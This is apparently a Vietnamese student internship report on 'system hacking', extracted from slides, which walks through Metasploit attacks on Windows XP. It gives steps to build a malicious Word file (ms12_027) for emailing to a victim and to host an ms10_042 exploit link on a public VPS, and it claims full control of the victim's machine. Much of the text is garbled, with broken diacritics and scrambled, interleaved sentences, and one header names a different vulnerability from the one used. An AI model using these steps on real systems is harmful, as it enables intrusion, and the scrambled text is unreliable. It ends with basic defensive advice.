Đang tải... (xem toàn văn)
Báo cáo thực tập system hacking
BÁO CÁO THỰC TẬP SYSTEM HACKING GVHD: Thầy Võ Đỗ Thắng SVTT: Trần Nguyễn Lộc MỤC LỤC Giới thiệu Thực T Tổng Kết Giới thiệu • Theo thống kê công ty Bkav, từ đầu năm 2013 đến nay, Việt Nam có 2.405 website quan, doanh nghiệp bị xâm nhập, trung bình tháng có khoảng 300 website bị cơng • Hiện nay, thiết bị máy tính PC, laptop, có kết nối mạng nội kết nối Internet Trên thiết bị này, hầu hết cài đặt phần mềm ứng dụng IE, Microsoft Office, Adobe Reader ,… chạy hệ điều hành Windows XP, Windows 7… Giới thiệu system hacking Gồm kỹ thuật lấy username, password dựa vào phần mềm cài hệ thống dịch vụ từ xa hệ điều hành Windows Nâng quyền hệ thống, sử dụng keyloger để lấy thơng tin, xóa log file hệ thống Hacker thực thứ máy tính đó, gây hậu vơ nghiêm trọng cho cá nhân, tổ chức Quá trình cơng vào hệ thống Tóm lại, q trình công hệ thống (System hacking) hệ thống Execute (thực thi): Thực thi ứng dụng Enumerate (liệt kê): Trích tất thơng tin có bước tiếp theotrước sau q trìnhkeylogger, đích.trong Chuẩn malware, thểmáy user hệ bị thống Sử dụng phương pháp thăm khảo sát, thu thập tin Hide file):để Những file thực thi, file soucecode chạy rootkit…để nónhững trênthơng máy tính dị (ẩn SNMP cóchạy thơng tin hữucơng ích, Crack:của Cơng đoạn có lẽtấn hấp dẫn Hackernhất chương trình… Cần phải làm ẩnnhiều đi, tránh bị mục mục tiêu cần công xác Bước cầuphát không bẽ khóa mậtlàkhẩu tiêu tiêu diệt Tracks (dấuyêu vết): Tất nhiên phải để lạiđăng dấu kỹ thuật nhập user Hoặc cách nàobạn tiêu vết Escalste Những (leo thơng thang): tinbằng có Nói liên cho quan dễ hiểu đến làkhác, chuyển cầnmục phải đổi bị Footprinting, Social phảitruy đạt tới truy cậpgì vào hệadmin thống giới xóa hạn sạch, khơng cập để từquyền user lại bất binh thường thứ Nếu lên không khả engineering, Enumeration, user cóbạn quyền bị phát caohiện đủkẻ cho độtchúng nhập ta công cao Google Hacking… áp dụng cho mục đích truy tìm thơng tin Hệ điều hành Backtrack R3 - Backtrack phân phối dạng Live DVD Linux, phát triển để thử nghiệm xâm nhập Backtrack hợp phân phối khác Linux thâm nhập thử nghiệm IWHAX, WHOPPIX, Auditor Trong phiên (5), Backtrack dựa phiên phân phối Linux Ubuntu 11.10 - Backtrack chứa số cơng cụ sử dụng q trình thử nghiệm thâm nhập Phần mềm Metasploit • Metasploit dự án bảo mật máy tính cung cấp thông tin vấn đề lỗ hổng bảo mật giúp đỡ kiểm tra thăm nhập phát triển hệ thống phát công mạng • Metasploit chạy hầu hết hệ điều hành: Linux, Windows, MacOS Tấn công mạng Lan Sơ đồ tổng quan hệ thống mạng LAN Trong mạng LAN nội bộ, máy tính thường kết nối với với khoảng cách vật lý gần phịng, tầng, tịa nhà, cơng ty, … Các máy tính mạng LAN chia sẻ tài nguyên với nhau, mà điển hình chia sẻ tập tin, máy in, máy quét số thiết bị khác CHUẨN BỊ máy backtrack R3 có địa IP: 172.16.0.9(máy cơng) máy win XP có địa IP 172.16.0.10(máy bị công) Xâm nhập khai thác Windows XP Khai thác lổ hổng Ms10-042 • Nhận dạng Lỗ hổng cho phép thực thi mã từ xa người dùng xem trang web thiết kế đặc biệt cách sử dụng trình duyệt web nhấp vào liên kết thiết kế đặc biệt thông báo e-mail b) Các bước công Mở giao diện console công cụ metasploit dòng lệnh msfconsole Search mã lỗi ms12_027 dòng lệnh :search ms12_027 Tiến hành khai thác mã lỗi dòng lệnh : use exploit /windows/fileformat/ms12_027_mscomctl_bof Xem hệ điều hành khai thác mã lỗi ms12_027 Tiến hành set filename set lhost -Lệnh set filename : tạo file word có chứa mã độc -Lệnh set lhost : set địa IP máy backtrack Sau tạo mã độc file word , ta tiến hành sao chép file word lên máy tính nạn nhân nhiều cách email……Khi nạn nhân mở file word bị nhiễm mã độc, ta chiếm tồn quyền điều khiển máy nạn nhân, cụ thể sessions tạo -Xem thông tin máy tính nạn nhân sau chiếm tồn quyền điều khiển -Và thực lệnh cơng khác mà muốn Khai thác lỗ hỗng window qua mạng internet a) Giới thiệu Honeypot Honeypot hệ thống tài nguyên thông tin xây dựng với mục đích giả dạng đánh lừa kẻ sử dụng xâm nhập không hợp pháp, thu hút ý chúng, ngăn không cho chúng tiếp xúc với hệ thống thật Hệ thống tài nguyên thơng tin có nghĩa Honeypot giả dạng loại máy chủ tài nguyên Mail Server, Domain Name Server, Web Server… Honeypot trực tiếp tương tác với tin tặc tìm cách khai thác thơng tin tin tặc hình thức công, công cụ công hay cách thức tiến hành thay bị cơng b) Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet Chúng ta – đóng vài trị Attacker, cần chuẩn bị: - VPS có địa IP public, cài đặt sẵn cơng cụ Metasploit (download http://metasploit.org) đóng vai trò Honeypot mạng c) Thực khai thác mã lỗi Khi thác lỗi ms10_042 windows xp -Mục đích việc khai thác mã lỗi khai thác lỗi css help center IE, sau khai thác thành công , ta chiếm tồn quyền điều khiển máy nạn nhân -Các bước tiến hành sau: • Khởi động chương trình metasploit máy chủ vps • Dùng lệnh search mã lỗi: để xem mã lỗi có tồn để khai thác hay không: Ở search 10_042 Dùng lệnh set srvhost ,lhost , exploit Dùng lệnh srvhost 14.0.21.113 : để set địa ip máy vps Dùng lệnh lhost 14.0.21.113 : để set địa ip máy vps Dùng lệnh Exploit để thực thi mã cài đặt, lúc đường link chứa mã độc tạo , nạn nhân kích vào đường link bị nhiễm mã độc ta chiếm tồn quyền điều khiển máy nạn nhân • Đến ta chiếm toàn quyền điều khiển máy nạn nhân Xem thông tin máy nạn nhân Tạo thư mục có tên thư mục TỔNG KẾT • Mật phải đặt nhiều ký tự phải tổng hợp chữ hoa, chữ thường, số ký tự đặc biệt để chương trình khó dị • Khơng mở tập tin đính kèm thư điện tử có nguồn gốc khơng rõ ràng khơng tin cậy • Chắc chắn bạn có bật hệ thống tường lửa cho hệ thống ... thống Hacker thực thứ máy tính đó, gây hậu vô nghiêm trọng cho cá nhân, tổ chức Q trình cơng vào hệ thống Tóm lại, q trình cơng hệ thống (System hacking) hệ thống Execute (thực thi): Thực thi ứng... cho phép thực thi mã từ xa người dùng xem trang web thiết kế đặc biệt cách sử dụng trình duyệt web nhấp vào liên kết thiết kế đặc biệt thông báo e-mail Xâm nhập khai thác Windows XP • Thực Mở... dụng IE, Microsoft Office, Adobe Reader ,… chạy hệ điều hành Windows XP, Windows 7… Giới thiệu system hacking Gồm kỹ thuật lấy username, password dựa vào phần mềm cài hệ thống dịch vụ từ xa hệ điều